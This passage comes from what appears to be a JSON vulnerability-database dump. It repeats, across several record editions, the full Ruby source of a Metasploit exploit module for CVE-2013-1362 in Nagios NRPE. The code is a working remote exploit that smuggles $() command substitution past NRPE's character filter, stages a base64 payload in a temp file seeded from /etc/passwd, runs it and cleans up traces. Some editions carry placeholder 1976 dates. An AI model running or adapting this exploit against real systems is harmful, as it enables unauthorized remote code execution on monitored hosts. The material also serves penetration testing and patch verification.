datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-29T23:57:07", "differentElements": ["modified", "published"], "edition": 60}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-30T03:56:25", "history": [], "viewCount": 92, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-30T03:56:25", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-30T03:56:25", "differentElements": ["modified", "published"], "edition": 61}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-06T14:12:56", "history": [], "viewCount": 93, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-06T14:12:56", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-06T14:12:56", "differentElements": ["modified", "published"], "edition": 62}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-06T16:11:08", "history": [], "viewCount": 95, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-06T16:11:08", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-06T16:11:08", "differentElements": ["modified", "published"], "edition": 63}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-04-15T10:23:48", "history": [], "viewCount": 95, "enchantments": {"score": {"value": 3.3, "modified": "2018-04-15T10:23:48", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-04-15T10:23:48", "differentElements": ["modified", "published"], "edition": 64}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
